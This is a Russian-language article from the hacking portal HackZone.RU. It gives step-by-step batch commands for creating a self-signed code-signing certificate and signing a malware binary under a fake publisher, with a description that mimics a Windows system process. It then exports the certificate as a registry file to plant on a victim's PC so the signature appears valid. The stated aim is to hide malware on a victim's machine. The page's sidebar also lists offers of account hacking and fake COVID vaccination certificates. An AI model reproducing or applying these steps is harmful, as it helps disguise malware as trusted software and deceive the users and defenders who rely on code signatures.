CASINOJOY - Ставка На Успех! Проверь Свою Удачу!


Нажмите CTRL-D чтобы добавить нас в закладки
HackZone.RU - Создание своего сертификата, и подпись им exe
Войти / Регистрация / Участники
Определение даты выпуска iPhone по серийному номеру
-
Поиск по сайту
Форумы



Реклама

Поиск ТОП Добавить публикацию

Создание своего сертификата, и подпись им exe

21.10.2012

Это скорее всего не статья, а заметка, которая при правильной эксплуатации, позволит злоумышленнику эффективно 'поиметь' ПК жертвы <= максимально скрыть присутствие зловреда в системе.

А именно, мы порассуждаем о цифровых подписях. Ведь приятно видеть свойства своего зловреда такими:


Создаем bat-файл с следующим содержимым:
Цитата:
makecert -n "CN=Morgan Software Corporation" -a sha1 -eku 1.3.6.1.5.5.7.3.3 -r -sv sertifikat.pvk sertifikat.cer -ss Root -sr localMachine
cert2spc.exe sertifikat.cer sertifikat.spc
PVKIMPRT.EXE -pfx sertifikat.spc sertifikat.pvk
signtool.exe sign /v /f sertifikat.pfx /p 1111 /t http://timestamp.verisign.com/scripts/timestamp.dll /d "Generic Host Process for Win32 Services" /v bot.exe
pause
И ложим рядом с ним наш зловред, bot.exe, и сами программы, которые необходимы для создания сертификата и подписи им бота (Cert2Spc.exe, makecert.exe, PVKIMPRT.exe, signtool.exe)
Запускаем bat-файл..


Вводим любой пароль (в данном случае он ВСЮДУ будет одинаковым - 1111) и нажимаем ОК. Следующие два шага так само:




Далее у нас появляется окошко, где ставим точку напротив "Да, экспортировать закрытый ключ", и жмем "Далее", "Далее", вводим ПАРОЛЬ (1111), и в корне сохраняем файл с именем "sertifikat.pfx", в конце жмем "Готово", и вуаля:


Наш бот подписан

Далее вкратце теория: все сертификаты, хранятся в реестре (HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertif icates\) по группам (Личные; Другие пользователи; Промежуточные центры сертификации; Доверенные корневые центры сертификации; Доверенные издатели; Издатели, не имеющие доверия)


И каждый сертификат является неким бинарным значением


Цель: нам нужно установить СВОЙ сертификат (будем ставить в AuthRoot) и экспортировать установленные значение бинарного вида в *.reg файл. Для этого будем использовать утилиту certmgr.exe.

Создаем bat-файл:
Цитата:
certmgr.exe -add -c sertifikat.cer -s -r localMachine AuthRoot
И ложим рядом с sertifikat.cer и программой certmgr.exe
Может у меня и глупый метод, но под руками не было никакого монитора реестра, а виртуалка была, вот и решил выкрутится..: удалить ВСЕ ветки В SystemCertificates. Удалили? Ок, теперь запускаем вышесозданный батник, и обновляем реестр, опа, добавился наш сертификат.

Далее мы его экспортируем в *.reg файл.


Итак, что мы имеем: подписанный нашим сертификатом вирус, и непосредственно reg-файл с записью, которую нужно обязательно установить на ПК жертвы (если мы ее не установим, будет писать, что цифровая подпись недействительна, т.к. она не совпадает с существующими там записями).


Теоретическая база была получена с хабра и ачата
Special for HackZone.RU & Woor.Team

При копировании материалов ссылка на HackZone.RU обязательна

Добавить страницу в закладки

 Детали
Категория: Прочее
Опубликовал: BRUNOTTI
Просмотров: 28032
Проголосовало через SMS: 0
  Разместить у себя на сайте
Прямая ссылка
HTML
BBCode ссылка
BBCode ссылка с текстом

 Комментарии (оставить свой комментарий можно здесь)
BRUNOTTI, отличная статья. Возьмем на заметку!Mad
22.10.2012 / pbetro
Только зарегистрированные пользователи могут оставлять комментарии

Зарегистрироваться *** Авторизоваться


 Последние новости и статьи  Последние сообщения с форумов
  • Баг в Safari приводит к утечке данных
  • В Darknet закрывается кардерский маркетплейс UniCC
  • Хакеры взломали украинские правительственные сайты
  • Уязвимость на diia.gov.ua
  • Опубликован бесплатный дешифратор для вымогателя BlackByte
  • Zerodium покупает уязвимости в ExpressVPN, NordVPN и Surfshark
  • За взломом сайтов REvil стояли правоохранительные органы
  • Уязвимость ProxyToken позволяет воровать почту через Microsoft Ex...
  • T-Mobile взломали через уязвимый роутер
  • Ботнет Phorpiex прекратил работу, его исходный код выставлен на п...

    Все новости... Все статьи... Прислать новость RSS
  • Взлом и безопасность / Новичкам » Услуги взлома социальных сетей от [email protected]
  • Взлом и безопасность / Программы » Купить QR код/сертификат о вакцинации против COVID-19
  • Разное / Болталка » Re: Форум жив?
  • Разное / Болталка » Форум жив?
  • Разное / Болталка » С Новым 2022 Годом!
  • Взлом и безопасность / Программы » Re: Hasp ключ для ABC-4
  • Портал / Отзывы и предложения » Предлагаем партнерство вашему форуму.
  • Разное / Предложения работы » взлом почты
  • Разное / Предложения работы » Re: Нужен Взлом сайта на DLE
  • Разное / Предложения работы » Сервис Postman - 500 руб за получение писем и 10€ за пересыл...

    Все форумы... RSS


  • Разместить рекламу
    © HackZone Ltd. 1996-2020. Все права зарегистрированы.
    Перепечатка материалов без согласования и указания источника будет преследоваться по Закону

    О проекте | История проекта | Размещение рекламы | Обратная связь | Правила поведения на портале
    contador de visitas счетчик посещений

    #{title}

    #{text}

    x

    #{title}

    #{text}